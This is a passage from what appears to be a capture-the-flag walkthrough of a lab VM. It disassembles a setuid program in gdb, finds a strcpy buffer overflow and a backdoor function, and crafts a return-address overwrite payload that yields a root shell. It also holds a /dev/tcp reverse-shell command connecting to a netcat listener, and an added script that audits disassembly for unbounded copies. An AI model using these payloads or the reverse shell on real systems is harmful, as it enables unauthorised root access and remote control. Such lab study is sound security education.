    0x080487c2 <+234>: sub esp,0xc
    0x080487c5 <+237>: lea eax,[ebx-0x1340]
    0x080487cb <+243>: push eax
    0x080487cc <+244>: call 0x8048480 <printf@plt>
    0x080487d1 <+249>: add esp,0x10
    0x080487d4 <+252>: sub esp,0x8
    0x080487d7 <+255>: lea eax,[ebp-0x48]
    0x080487da <+258>: push eax
    0x080487db <+259>: lea eax,[ebx-0x1352]
    0x080487e1 <+265>: push eax
    0x080487e2 <+266>: call 0x8048540 <__isoc99_scanf@plt>
    0x080487e7 <+271>: add esp,0x10
    0x080487ea <+274>: call 0x80484a0 <getchar@plt>
    0x080487ef <+279>: mov DWORD PTR [ebp-0x20],eax
    0x080487f2 <+282>: cmp DWORD PTR [ebp-0x20],0xa
    0x080487f6 <+286>: je 0x80487fe <main+294>
    0x080487f8 <+288>: cmp DWORD PTR [ebp-0x20],0xffffffff
    0x080487fc <+292>: jne 0x80487ea <main+274>
    0x080487fe <+294>: mov eax,DWORD PTR [ebp-0x48]
    0x08048801 <+297>: cmp eax,0x1
    0x08048804 <+300>: jne 0x804883c <main+356>
    0x08048806 <+302>: sub esp,0xc
    0x08048809 <+305>: lea eax,[ebx-0x1317]
    0x0804880f <+311>: push eax
    0x08048810 <+312>: call 0x8048480 <printf@plt>
    0x08048815 <+317>: add esp,0x10
    0x08048818 <+320>: sub esp,0xc
    0x0804881b <+323>: lea eax,[ebp-0xac]
    0x08048821 <+329>: push eax
    0x08048822 <+330>: call 0x8048490 <gets@plt>
    0x08048827 <+335>: add esp,0x10
    0x0804882a <+338>: sub esp,0xc
    0x0804882d <+341>: lea eax,[ebp-0xac]
    0x08048833 <+347>: push eax
    0x08048834 <+348>: call 0x80486ad <vuln>
    0x08048839 <+353>: add esp,0x10
    0x0804883c <+356>: sub esp,0xc
    0x0804883f <+359>: lea eax,[ebx-0x130d]
    0x08048845 <+365>: push eax
    0x08048846 <+366>: call 0x80484e0 <puts@plt>
    0x0804884b <+371>: add esp,0x10
    0x0804884e <+374>: mov ecx,DWORD PTR [ebp-0x48]
    0x08048851 <+377>: mov edx,DWORD PTR [ebp-0x44]
    0x08048854 <+380>: mov eax,DWORD PTR [ebp-0x40]
    0x08048857 <+383>: sub esp,0x8
    0x0804885a <+386>: lea esi,[ebp-0xac]
    0x08048860 <+392>: push esi
    0x08048861 <+393>: push ecx
    0x08048862 <+394>: push edx
    0x08048863 <+395>: push eax
    0x08048864 <+396>: lea eax,[ebp-0x39]
    0x08048867 <+399>: push eax
    0x08048868 <+400>: lea eax,[ebx-0x12ec]
    0x0804886e <+406>: push eax
    0x0804886f <+407>: call 0x8048480 <printf@plt>
    0x08048874 <+412>: add esp,0x20
    0x08048877 <+415>: mov ecx,DWORD PTR [ebp-0x48]
    0x0804887a <+418>: mov edx,DWORD PTR [ebp-0x44]
    0x0804887d <+421>: mov eax,DWORD PTR [ebp-0x40]
    0x08048880 <+424>: sub esp,0x4
    0x08048883 <+427>: lea esi,[ebp-0xac]
    0x08048889 <+433>: push esi
    0x0804888a <+434>: push ecx
    0x0804888b <+435>: push edx
    0x0804888c <+436>: push eax
    0x0804888d <+437>: lea eax,[ebp-0x39]
    0x08048890 <+440>: push eax
    0x08048891 <+441>: lea eax,[ebx-0x12ec]
    0x08048897 <+447>: push eax
    0x08048898 <+448>: push DWORD PTR [ebp-0x1c]
    0x0804889b <+451>: call 0x8048510 <fprintf@plt>
    0x080488a0 <+456>: add esp,0x20
    0x080488a3 <+459>: sub esp,0xc
    0x080488a6 <+462>: push DWORD PTR [ebp-0x1c]
    0x080488a9 <+465>: call 0x80484c0 <fclose@plt>
    0x080488ae <+470>: add esp,0x10
    0x080488b1 <+473>: mov eax,0x0
    0x080488b6 <+478>: lea esp,[ebp-0x10]
    0x080488b9 <+481>: pop ecx
    0x080488ba <+482>: pop ebx
    0x080488bb <+483>: pop esi
    0x080488bc <+484>: pop edi
    0x080488bd <+485>: pop ebp
    0x080488be <+486>: lea esp,[ecx-0x4]
    0x080488c1 <+489>: ret
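    • Focus on what follows each call instruction; these are usually function calls

      • For example, 0x08048729 <+81>: call 0x8048520 <fopen@plt> opens a file
    • The suspicious 0x08048834 <+348>: call 0x80486ad <vuln> is probably a function written by the program's author; names carrying @plt are generally library functions reached through the PLT

  • Use info func to list all functions

    • Key functions among them

      • 0x080484f0 system@plt
      • 0x08048530 setuid@plt
    • Suspicious ones

      • 0x08048676 backdoor (the name itself means a back door)
      • 0x080486ad vuln
  • Use disas vuln to view the assembly of the vuln function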

    0x080486ad <+0>:     push   ebp
    0x080486ae <+1>: mov ebp,esp
    0x080486b0 <+3>: push ebx
    0x080486b1 <+4>: sub esp,0x44
    0x080486b4 <+7>: call 0x80488c2 <__x86.get_pc_thunk.ax>
    0x080486b9 <+12>: add eax,0x168f
    0x080486be <+17>: sub esp,0x8
    0x080486c1 <+20>: push DWORD PTR [ebp+0x8]
    0x080486c4 <+23>: lea edx,[ebp-0x3a]
    0x080486c7 <+26>: push edx
    0x080486c8 <+27>: mov ebx,eax
    0x080486ca <+29>: call 0x80484d0 <strcpy@plt>
    0x080486cf <+34>: add esp,0x10
    0x080486d2 <+37>: nop
    0x080486d3 <+38>: mov ebx,DWORD PTR [ebp-0x4]
    0x080486d6 <+41>: leave
    0x080486d7 <+42>: ret
    • The buffer overflow is probably caused by 0x080486ca <+29>: call 0x80484d0 <strcpy@plt>
  • Then look at backdoor

    0x08048676 <+0>:     push   ebp
    0x08048677 <+1>: mov ebp,esp
    0x08048679 <+3>: push ebx
    0x0804867a <+4>: sub esp,0x4
    0x0804867d <+7>: call 0x80485b0 <__x86.get_pc_thunk.bx>
    0x08048682 <+12>: add ebx,0x16c6
    0x08048688 <+18>: sub esp,0xc
    0x0804868b <+21>: push 0x0
    0x0804868d <+23>: call 0x8048530 <setuid@plt>
    0x08048692 <+28>: add esp,0x10
    0x08048695 <+31>: sub esp,0xc
    0x08048698 <+34>: lea eax,[ebx-0x13f8]
    0x0804869e <+40>: push eax
    0x0804869f <+41>: call 0x80484f0 <system@plt>
    0x080486a4 <+46>: add esp,0x10
    0x080486a7 <+49>: nop
    0x080486a8 <+50>: mov ebx,DWORD PTR [ebp-0x4]
    0x080486ab <+53>: leave
    0x080486ac <+54>: ret
    • It involves a number of system-level functions
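
As an added example (not part of the original write-up or of the target's code), the manual reading of the disas output above can be turned into a repeatable audit: the script scans gdb-style 32-bit disassembly for libc copy calls, resolves the destination to its distance below EBP, and separates calls that carry a length argument from those that do not. The sample text is excerpted from the main and vuln listings above with constructed "Dump of assembler code" header lines; audit(), SAMPLE and the two call tables are names assumed for this example.

```python
# Added example: triage gdb "disas" text for unbounded copies into stack buffers.
import re

INSN = re.compile(r"0x[0-9a-f]+\s+<\+(\d+)>:\s+(\w+)\s*(.*)")
FUNC = re.compile(r"function (\w+):")
LEA_LOCAL = re.compile(r"(\w+),\[ebp-0x([0-9a-f]+)\]$")
PLT_CALL = re.compile(r"<(\w+)@plt>")

UNBOUNDED = {"gets", "strcpy", "strcat", "sprintf"}   # no length argument at all
SIZED = {"fgets": 1, "strncpy": 2, "snprintf": 1}      # index of the length argument

# Excerpts from the page's listings; the header lines are constructed.
SAMPLE = """
Dump of assembler code for function main:
   0x0804875e <+134>: mov eax,DWORD PTR [eax]
   0x08048760 <+136>: sub esp,0x4
   0x08048763 <+139>: push eax
   0x08048764 <+140>: push 0x19
   0x08048766 <+142>: lea eax,[ebp-0x39]
   0x08048769 <+145>: push eax
   0x0804876a <+146>: call 0x80484b0 <fgets@plt>
   0x0804881b <+323>: lea eax,[ebp-0xac]
   0x08048821 <+329>: push eax
   0x08048822 <+330>: call 0x8048490 <gets@plt>
Dump of assembler code for function vuln:
   0x080486c1 <+20>: push DWORD PTR [ebp+0x8]
   0x080486c4 <+23>: lea edx,[ebp-0x3a]
   0x080486c7 <+26>: push edx
   0x080486c8 <+27>: mov ebx,eax
   0x080486ca <+29>: call 0x80484d0 <strcpy@plt>
"""


def audit(disas):
    """Return one finding per libc copy call whose destination is a local stack buffer."""
    findings, pushes, reg_local, func = [], [], {}, "?"
    for line in disas.splitlines():
        header = FUNC.search(line)
        if header:
            func = header.group(1)
            continue
        m = INSN.search(line)
        if not m:
            continue
        offset, op, args = int(m.group(1)), m.group(2), m.group(3).strip()
        if op == "lea":
            local = LEA_LOCAL.match(args)
            if local:   # register now holds the address of a local at ebp-N
                reg_local[local.group(1)] = int(local.group(2), 16)
            else:
                reg_local.pop(args.split(",")[0], None)
        elif op == "mov":
            reg_local.pop(args.split(",")[0], None)
        elif op == "push":
            if args in reg_local:
                pushes.append(("local", reg_local[args]))
            elif re.fullmatch(r"0x[0-9a-f]+", args):
                pushes.append(("imm", int(args, 16)))
            else:
                pushes.append(("unknown", None))
        elif op == "call":
            argv, pushes = pushes[::-1], []   # cdecl: the last push is the first argument
            reg_local.clear()                 # eax/ecx/edx do not survive a call
            callee = PLT_CALL.search(args)
            if not callee or not argv or argv[0][0] != "local":
                continue
            name, room = callee.group(1), argv[0][1]
            if name in UNBOUNDED:
                limit, verdict = None, "unbounded"
            elif name in SIZED:
                idx = SIZED[name]
                kind, value = argv[idx] if idx < len(argv) else ("unknown", None)
                limit = value if kind == "imm" else None
                # room is only an upper bound on the buffer size (distance to saved EBP).
                verdict = "bounded" if limit is not None and limit <= room else "review"
            else:
                continue
            findings.append({"function": func, "offset": offset, "call": name,
                             "dest_below_ebp": room, "limit": limit, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The fgets call into the name buffer carries a 25-byte limit, which is consistent with the Employee Name prompt not crashing earlier, while gets in main and strcpy in vuln write with no limit at all.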

We need to build a file containing the injected data to use as the program's input

python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text
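  • 0x08048676 is the start address of backdoor

  • struct.pack('I', ...) packs 0x08048676 as a 4-byte unsigned integer in native byte order, which on x86 is little-endian, so the bytes are written in reverse: 76 86 04 08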

    socnet@socnet2:~$ python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text
    < + 'a' * 62 + struct.pack('I', 0x08048676))" > text
    socnet@socnet2:~$ ls
    ls
    add_record monitor.py peda-session-add_record.txt
    employee_records.txt peda text
    socnet@socnet2:~$ gdb -q ./add_record
    gdb -q ./add_record
    Reading symbols from ./add_record...(no debugging symbols found)...done.
    gdb-peda$ break vuln
    break vuln
    Breakpoint 1 at 0x80486b1
    gdb-peda$ r < text
    • break vuln sets a breakpoint on the vuln function
    • Keep stepping with s until backdoor appears
    [-------------------------------------code-------------------------------------]
    0x8048673 <frame_dummy+3>: pop ebp
    0x8048674 <frame_dummy+4>: jmp 0x8048600 <register_tm_clones>
    0x8048676 <backdoor>: push ebp
    => 0x8048677 <backdoor+1>: mov ebp,esp
    0x8048679 <backdoor+3>: push ebx
    0x804867a <backdoor+4>: sub esp,0x4
    0x804867d <backdoor+7>: call 0x80485b0 <__x86.get_pc_thunk.bx>
    0x8048682 <backdoor+12>: add ebx,0x16c6
    [------------------------------------stack-------------------------------------]
    0000| 0xffffdc5c ("aaaa")
    0004| 0xffffdc60 --> 0xffffdc00 --> 0xffffdc1e ('a' <repeats 66 times>)
    0008| 0xffffdc64 --> 0xffffdce0 --> 0x1
    0012| 0xffffdc68 --> 0xffffdd28 --> 0x0
    0016| 0xffffdc6c --> 0x80487ef (<main+279>: mov DWORD PTR [ebp-0x20],eax)
    0020| 0xffffdc70 --> 0x0
    0024| 0xffffdc74 --> 0x0
    0028| 0xffffdc78 --> 0xc2
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x08048677 in backdoor ()
    • At backdoor+23, 0x804868d <backdoor+23>: call 0x8048530 <setuid@plt> calls setuid@plt
    0xf7e29d10 <system>: sub    esp,0xc
    0xf7e29d13 <system+3>: mov eax,DWORD PTR [esp+0x10]
    0xf7e29d17 <system+7>: call 0xf7f21c7d
    0xf7e29d1c <system+12>: add edx,0x1982e4
    0xf7e29d22 <system+18>: test eax,eax
    [------------------------------------stack-------------------------------------]
    0000| 0xffffdc40 --> 0x80486a4 (<backdoor+46>: add esp,0x10)
    0004| 0xffffdc44 --> 0x8048950 ("/bin/bash")
    0008| 0xffffdc48 ("aaaaaaaa\202\206\004\b", 'a' <repeats 12 times>)
    0012| 0xffffdc4c ("aaaa\202\206\004\b", 'a' <repeats 12 times>)
    0016| 0xffffdc50 --> 0x8048682 (<backdoor+12>: add ebx,0x16c6)
    0020| 0xffffdc54 ('a' <repeats 12 times>)
    0024| 0xffffdc58 ("aaaaaaaa")
    0028| 0xffffdc5c ("aaaa")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0xf7e29d10 in system () from /lib32/libc.so.6
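    • "/bin/bash" has now been passed as the argument to system@plt; the bash started here runs with root privileges

With the exploit path confirmed in the debugger, run it outside gdb with cat text - | ./add_record (the trailing - keeps stdin open so commands can be typed into the spawned shell)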

socnet@socnet2:~$ cat text - | ./add_record
cat text - | ./add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
id
id
uid=0(root) gid=1000(socnet) groups=1000(socnet),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
  • On Kali, start a listener again: nc -nvlp 6666
  • In the shell obtained through the vulnerability, run bash -i >& /dev/tcp/192.168.56.111/6666 0>&1 to connect back

Result

┌──(kali㉿kali)-[~/workspace]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 46716
root@socnet2:~#

Target machine complete
